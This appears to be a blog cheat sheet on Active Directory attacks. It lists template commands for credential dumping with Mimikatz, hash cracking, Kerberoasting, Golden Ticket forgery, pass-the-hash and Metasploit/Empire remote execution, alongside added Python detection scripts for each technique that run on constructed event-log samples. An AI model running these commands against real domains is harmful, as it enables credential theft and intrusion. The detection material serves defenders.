Aditya Chauhan
Feb 21, 2023

Active Directory Exploitation Cheat Sheet

Active Directory (AD) exploitation involves identifying and exploiting vulnerabilities within an AD environment. In this cheat sheet, we will provide an overview of some of the key techniques and tools that can be used for AD exploitation.

1. Password attacks

Password attacks are one of the most common methods used to gain access to an AD environment. The following tools can be used for password attacks:

  • Mimikatz: A tool that extracts passwords and other credentials from the memory of the LSASS process. The privilege::debug module in the command below requests the debug privilege that opening LSASS requires.

Example command: mimikatz.exe "privilege::debug" "sekurlsa::logonPasswords full"

  • Hashcat: A password cracking tool that can be used to crack password hashes.

Example command: hashcat -m 1000 -a 0 <password hashes> <wordlist>

  • John the Ripper: Another password cracking tool that can be used to crack password hashes.

Example command: john --wordlist=<wordlist> --format=nt <password hashes>
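The credential-dumping command above is visible to defenders as a handle opened on lsass.exe with memory-read access. The following detection is an added example, not code from the original cheat sheet or from Sysmon, and it assumes Sysmon ProcessAccess (Event ID 10) records have been exported to dicts keyed by Sysmon's field names; the sample events and the allowlist are constructed for illustration.

```python
"""Flag credential-dumping style access to LSASS from Sysmon ProcessAccess
(Event ID 10) records.

Added example: not part of the original cheat sheet and not Sysmon's own code.
It assumes the events were exported to dicts keyed by Sysmon's field names
(EventID, SourceImage, TargetImage, GrantedAccess). The sample events and the
allowlist below are constructed for illustration.
"""
from typing import Iterable, List, Tuple

# Process access right that a tool needs to read credential material out of
# LSASS memory (PROCESS_VM_READ from the Win32 process-rights table).
PROCESS_VM_READ = 0x0010

# Processes that open LSASS with read access as part of normal operation.
# Assumption: a short illustrative list; build the real one from a baseline.
ALLOWLIST = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\services.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}


def is_suspicious_lsass_access(event: dict) -> bool:
    """True when a non-allowlisted process opens lsass.exe with a handle
    that includes PROCESS_VM_READ."""
    if event.get("EventID") != 10:
        return False
    if not event.get("TargetImage", "").lower().endswith("\\lsass.exe"):
        return False
    granted = int(event.get("GrantedAccess", "0x0"), 16)
    if not granted & PROCESS_VM_READ:
        # A handle that cannot read memory cannot carry credentials out.
        return False
    return event.get("SourceImage", "").lower() not in ALLOWLIST


def scan(events: Iterable[dict]) -> List[Tuple[str, str]]:
    """(SourceImage, GrantedAccess) for every suspicious LSASS access."""
    return [(e["SourceImage"], e["GrantedAccess"])
            for e in events if is_suspicious_lsass_access(e)]


# Constructed Sysmon records, not captured from a real host.
LSASS = r"C:\Windows\System32\lsass.exe"
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": LSASS, "GrantedAccess": "0x1000"},   # query only, no VM_READ
    {"EventID": 10, "SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": LSASS, "GrantedAccess": "0x1010"},   # reads memory, but allowlisted
    {"EventID": 10, "SourceImage": r"C:\Users\bob\Downloads\dump.exe",
     "TargetImage": LSASS, "GrantedAccess": "0x1010"},   # classic dumping mask
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\notepad.exe",
     "TargetImage": r"C:\Windows\explorer.exe", "GrantedAccess": "0x1FFFFF"},  # not LSASS
    {"EventID": 10, "SourceImage": r"C:\Temp\svc.exe",
     "TargetImage": LSASS, "GrantedAccess": "0x1FFFFF"},  # full access from an odd path
    {"EventID": 1, "SourceImage": r"C:\Temp\svc.exe",
     "TargetImage": "", "GrantedAccess": "0x0"},          # different event type
]

if __name__ == "__main__":
    for source, mask in scan(SAMPLE_EVENTS):
        print(f"suspicious LSASS access: {source} (GrantedAccess={mask})")
```

The check keys on the access mask rather than on a tool name, so renamed or rebuilt dumpers are caught as long as they still need to read LSASS memory; the cost is that the allowlist has to be maintained from a real baseline of the environment.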

2. Kerberos attacks

Kerberos is the authentication protocol used by AD, and it is a prime target for exploitation. The following tools can be used for Kerberos attacks:

  • Kerberoast (Kerberoasting): A technique rather than a single tool. It requests service tickets for accounts that have a Service Principal Name (SPN); the encrypted part of each ticket can then be cracked offline to recover the service account's password. GetUserSPNs.py from Impacket performs the requests; accounts whose tickets are issued with RC4 and that carry short passwords are the exposed ones.

Example command: GetUserSPNs.py <domain>/<user>:<password> -request

  • Golden Ticket: A technique that forges a Kerberos Ticket Granting Ticket (TGT) using the password hash of the krbtgt account; the forged ticket remains usable until that hash is changed.

Example command: mimikatz.exe "kerberos::golden /user:<user> /domain:<domain> /sid:<SID> /krbtgt:<krbtgt hash> /ticket:<ticket file>"
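Both Kerberos techniques above leave traces in the domain controllers' Event ID 4769 (service ticket request) records: Kerberoasting shows as one account collecting RC4 tickets for many distinct SPNs in a short time, and a forged TGT can carry a user name that does not exist in the directory. The analysis below is an added example, not code from the original cheat sheet or from any tool it names; it assumes 4769 events exported to dicts keyed by the event's own field names, and the sample events and directory listing are constructed.

```python
"""Spot Kerberoasting bursts and service-ticket requests by principals the
directory does not know, from exported Event ID 4769 (TGS request) records.

Added example: not part of the original cheat sheet or of any tool it names.
It assumes 4769 events exported to dicts keyed by the event's own field names
(TargetUserName, ServiceName, TicketEncryptionType, TimeCreated). All sample
events and the directory listing are constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, Iterable, List, Set, Tuple

RC4_HMAC = 0x17  # encryption type a roasting tool asks for, since RC4 cracks fastest


def kerberoast_candidates(events: Iterable[dict],
                          window: timedelta = timedelta(minutes=5),
                          min_spns: int = 5) -> List[str]:
    """Accounts that obtained RC4 service tickets for at least min_spns
    distinct services inside any window-long interval."""
    per_user: Dict[str, List[Tuple[datetime, str]]] = defaultdict(list)
    for e in events:
        if e.get("EventID") != 4769:
            continue
        if int(e["TicketEncryptionType"], 16) != RC4_HMAC:
            continue
        svc = e["ServiceName"]
        # Computer accounts and krbtgt are not the user SPNs a roast targets.
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        per_user[e["TargetUserName"]].append(
            (datetime.fromisoformat(e["TimeCreated"]), svc))

    flagged = []
    for user, requests in per_user.items():
        requests.sort()
        for i, (start, _) in enumerate(requests):
            in_window = {svc for t, svc in requests[i:] if t - start <= window}
            if len(in_window) >= min_spns:
                flagged.append(user)
                break
    return sorted(flagged)


def unknown_principals(events: Iterable[dict], directory_accounts: Set[str]) -> List[str]:
    """Requesting account names that do not exist in the directory. A forged
    TGT can carry any name, so a ticket for a nonexistent user is a strong
    golden-ticket indicator."""
    known = {a.lower() for a in directory_accounts}
    return sorted({e["TargetUserName"] for e in events
                   if e.get("EventID") == 4769
                   and e["TargetUserName"].lower() not in known})


# Constructed sample data.
BASE = datetime(2023, 2, 21, 10, 0, 0)


def _tgs(user: str, service: str, etype: str, offset_s: int) -> dict:
    return {"EventID": 4769, "TargetUserName": user, "ServiceName": service,
            "TicketEncryptionType": etype,
            "TimeCreated": (BASE + timedelta(seconds=offset_s)).isoformat()}


SAMPLE_EVENTS = (
    [_tgs("alice", f"svc_sql{i}", "0x17", i * 2) for i in range(6)]   # RC4 burst: 6 SPNs in 10 s
    + [_tgs("bob", "svc_web", "0x17", 30), _tgs("bob", "svc_sql0", "0x17", 3600)]  # two, an hour apart
    + [_tgs("carol", f"svc_app{i}", "0x12", i) for i in range(6)]     # AES tickets, not RC4
    + [_tgs("dave", "FS01$", "0x17", 5)]                               # computer account SPN
    + [_tgs("ghostadmin", "krbtgt", "0x17", 50)]                       # name absent from directory
)
DIRECTORY = {"alice", "bob", "carol", "dave"}

if __name__ == "__main__":
    print("kerberoast candidates:", kerberoast_candidates(SAMPLE_EVENTS))
    print("unknown principals:", unknown_principals(SAMPLE_EVENTS, DIRECTORY))
```

The window and threshold are starting points; monitoring tools that enumerate SPNs legitimately will need to be baselined, and the RC4 filter becomes a strong signal only once service accounts are configured for AES, which is also the mitigation that makes the roast itself far more expensive.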

3. Pass-the-Hash attacks

Pass-the-Hash attacks involve using a password hash to authenticate to an AD environment, without actually knowing the password. The following tools can be used for Pass-the-Hash attacks:

  • PsExec: A Sysinternals tool that executes commands on remote machines. Note that its -p switch expects a cleartext password; Sysinternals PsExec does not accept an NTLM hash, so the example below only works as written with a password, and a true Pass-the-Hash needs a PsExec-style implementation that takes hashes directly (Impacket ships one).

Example command: PsExec.exe \\target -u <user> -p <NTLM hash> cmd.exe

  • Impacket: A collection of Python classes for working with network protocols, including SMB; its client scripts accept NTLM hashes directly. The pth-smbclient command below actually comes from the pth-toolkit (the passing-the-hash package shipped with Kali), not from Impacket, and is invoked without a .py suffix.

Example command: pth-smbclient //<target IP>/IPC$ -U "<user>%<NTLM hash>"
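A replayed hash is indistinguishable from a password at the protocol level, so detection relies on where and how NTLM shows up in Event ID 4624 logon records. The triage below is an added example, not code from the original cheat sheet or from any tool it names; it assumes 4624 events exported to dicts keyed by the event's own field names, and the sample records and privileged-account list are constructed.

```python
"""Classify Event ID 4624 logon records for the traces pass-the-hash leaves.

Added example: not part of the original cheat sheet and not from any tool it
names. It assumes 4624 events exported to dicts keyed by the event's own
field names (LogonType, LogonProcessName, AuthenticationPackageName,
TargetDomainName, TargetUserName). Sample records and the privileged-account
list are constructed.
"""
from typing import Iterable, List, Tuple

LOGON_NETWORK = 3          # SMB, RPC and similar remote access
LOGON_NEW_CREDENTIALS = 9  # runas /netonly and in-memory hash injection

# Accounts that should authenticate with Kerberos only (assumption: tune per domain).
PRIVILEGED = {"domain\\da-alice", "domain\\svc-backup"}


def pth_indicators(e: dict) -> List[str]:
    """Reasons a 4624 record resembles pass-the-hash; empty list if none."""
    reasons: List[str] = []
    if e.get("EventID") != 4624:
        return reasons
    logon_type = int(e.get("LogonType", 0))
    # 4624 pads LogonProcessName with trailing spaces ("NtLmSsp ").
    process = e.get("LogonProcessName", "").strip().lower()
    package = e.get("AuthenticationPackageName", "").strip().lower()
    account = f'{e.get("TargetDomainName", "")}\\{e.get("TargetUserName", "")}'.lower()

    # Injecting a hash into a new logon session on the host produces a
    # NewCredentials logon through the "seclogo" logon process with Negotiate.
    # runas /netonly leaves the identical trio, so baseline legitimate users of it.
    if logon_type == LOGON_NEW_CREDENTIALS and process == "seclogo" and package == "negotiate":
        reasons.append("newcredentials_seclogo")

    # Hashes are replayed over NTLM. A privileged account arriving over the
    # network with NTLM rather than Kerberos is worth a look every time.
    if logon_type == LOGON_NETWORK and package == "ntlm" and account in PRIVILEGED:
        reasons.append("ntlm_network_logon_privileged")
    return reasons


def triage(events: Iterable[dict]) -> List[Tuple[str, List[str]]]:
    """(TargetUserName, reasons) for every record with at least one indicator."""
    out = []
    for e in events:
        reasons = pth_indicators(e)
        if reasons:
            out.append((e.get("TargetUserName", ""), reasons))
    return out


def _logon(user: str, logon_type: str, process: str, package: str) -> dict:
    return {"EventID": 4624, "LogonType": logon_type, "LogonProcessName": process,
            "AuthenticationPackageName": package,
            "TargetDomainName": "DOMAIN", "TargetUserName": user}


# Constructed sample records.
SAMPLE_EVENTS = [
    _logon("alice", "2", "User32 ", "Negotiate"),      # console logon
    _logon("bob", "9", "seclogo", "Negotiate"),        # runas /netonly or hash injection
    _logon("da-alice", "3", "Kerberos", "Kerberos"),   # expected for an admin
    _logon("da-alice", "3", "NtLmSsp ", "NTLM"),       # admin over NTLM
    _logon("printer-svc", "3", "NtLmSsp ", "NTLM"),    # NTLM, but not a privileged account
]

if __name__ == "__main__":
    for user, reasons in triage(SAMPLE_EVENTS):
        print(f"{user}: {', '.join(reasons)}")
```

The second rule only pays off once the privileged accounts really are Kerberos-only, which is also the mitigation: placing them in the Protected Users group and restricting NTLM by policy turns an NTLM logon by such an account from noise into an alert.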

4. Remote code execution

Remote code execution involves executing code on a remote machine, which can be used to gain access to an AD environment. The following tools can be used for remote code execution:

  • Metasploit: A popular framework for exploit development and delivery, which includes a range of modules for AD exploitation.

Example command: use exploit/windows/smb/ms17_010_psexec (selects the module for the SMBv1 flaw patched by MS17-010, which then runs its payload PsExec-style)

  • Empire: A post-exploitation framework that can be used to gain and maintain access to a compromised machine.

Example command: usemodule manage/windows/shellcode_inject/multi
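Both PsExec and the Metasploit psexec module above obtain execution by installing a service on the target, which the System log records as Event ID 7045. The check below is an added example, not code from the original cheat sheet or from PsExec, Metasploit or Empire; it assumes 7045 events exported to dicts with the event's ServiceName and ImagePath fields, and the sample records are constructed.

```python
"""Flag service installations (System log, Event ID 7045) that look like
PsExec-style remote execution.

Added example: not part of the original cheat sheet and not the code of
PsExec, Metasploit or Empire. It assumes 7045 events exported to dicts with
the event's ServiceName and ImagePath fields. Sample records are constructed.
"""
import re
from typing import Iterable, List, Tuple

# Eight letters with no digits is the shape of a machine-generated service name.
RANDOM_NAME = re.compile(r"^[A-Za-z]{8}$")
# A service whose binary is a command interpreter running a one-liner.
SHELL_LAUNCH = re.compile(r"(%COMSPEC%|cmd\.exe)(\s+/[a-z])*\s+/c\b", re.IGNORECASE)


def case_switches(name: str) -> int:
    """Number of upper/lower case changes between neighbouring letters."""
    return sum(1 for a, b in zip(name, name[1:]) if a.isupper() != b.isupper())


def service_install_indicators(e: dict) -> List[str]:
    """Reasons a 7045 record resembles a remote-execution service; empty if none."""
    reasons: List[str] = []
    if e.get("EventID") != 7045:
        return reasons
    name = e.get("ServiceName", "")
    path = e.get("ImagePath", "")
    # Sysinternals PsExec installs a service literally named PSEXESVC.
    if name.upper() == "PSEXESVC" or "psexesvc" in path.lower():
        reasons.append("psexec_service")
    # Services that exist only to run cmd.exe /c ... are rarely legitimate.
    if SHELL_LAUNCH.search(path):
        reasons.append("shell_launch_imagepath")
    # A service binary on a UNC path was pushed from elsewhere.
    if path.startswith("\\\\"):
        reasons.append("unc_imagepath")
    # Random mixed-case names (many case switches) versus words like "Netlogon".
    if RANDOM_NAME.match(name) and case_switches(name) >= 4:
        reasons.append("random_service_name")
    return reasons


def triage(events: Iterable[dict]) -> List[Tuple[str, List[str]]]:
    """(ServiceName, reasons) for every record with at least one indicator."""
    out = []
    for e in events:
        reasons = service_install_indicators(e)
        if reasons:
            out.append((e.get("ServiceName", ""), reasons))
    return out


# Constructed sample records.
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "PSEXESVC", "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
    {"EventID": 7045, "ServiceName": "XyQaWpLm",
     "ImagePath": "%COMSPEC% /b /c start /b /min cmd.exe"},
    {"EventID": 7045, "ServiceName": "Sense",
     "ImagePath": r'"C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe"'},
    {"EventID": 7045, "ServiceName": "Netlogon", "ImagePath": r"C:\Windows\system32\lsass.exe"},
    {"EventID": 7045, "ServiceName": "RemoteTool", "ImagePath": r"\\fileserver\tools\agent.exe"},
    {"EventID": 7036, "ServiceName": "XyQaWpLm", "ImagePath": ""},   # state change, not an install
]

if __name__ == "__main__":
    for name, reasons in triage(SAMPLE_EVENTS):
        print(f"{name}: {', '.join(reasons)}")
```

Service installs are rare on workstations, so every 7045 can be reviewed there; on servers the name and ImagePath heuristics above do the filtering, and a hit is best correlated with the 4624 network logon that preceded it.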

These are just a few examples of the tools and techniques that can be used for AD exploitation. It is important to note that AD exploitation can be complex and challenging, and should only be attempted by experienced and authorized pentesters.
